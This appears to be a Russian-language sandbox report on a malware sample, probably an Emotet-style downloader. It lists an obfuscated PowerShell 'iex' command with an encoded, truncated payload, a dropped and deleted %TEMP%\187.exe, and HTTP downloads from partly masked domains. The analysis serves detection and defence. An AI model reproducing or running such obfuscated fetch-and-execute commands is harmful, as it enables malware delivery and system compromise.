Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' .( $PsHOME[4]+$PsHoMe[34]+'x') ( " $(SeT-iTem 'variaBlE:ofs' '') "+ [STrInG]( '123j49Q10E7_98{49_58{40I114v48Q61v53j58I60>43>127E17E58x43I113I8j58>61j28>51{54E58{49j43E100>123_62>26j44_98>120{5...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\187.exe
Удаляет следующие файлы
- %TEMP%\187.exe
Сетевая активность
Подключается к
- 'tr####yempire.org':80
- 'an###llc.com':80
- 'id###balance.hu':80
- 'ly##kov.ru':80
TCP
Запросы HTTP GET
- http://www.tr####yempire.org/pvYjZuR/
- http://www.an###llc.com/4DpV/
- http://an###llc.com/4DpV/
- http://id###balance.hu/T0oWj/
UDP
- DNS ASK tr####yempire.org
- DNS ASK an###llc.com
- DNS ASK id###balance.hu
- DNS ASK ly##kov.ru
- DNS ASK xa##gz.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' .( $PsHOME[4]+$PsHoMe[34]+'x') ( " $(SeT-iTem 'variaBlE:ofs' '') "+ [STrInG]( '123j49Q10E7_98{49_58{40I114v48Q61v53j58I60>43>127E17E58x43I113I8j58>61j28>51{54E58{49j43E100>123_62>26j44_98>120{5...' (со скрытым окном)
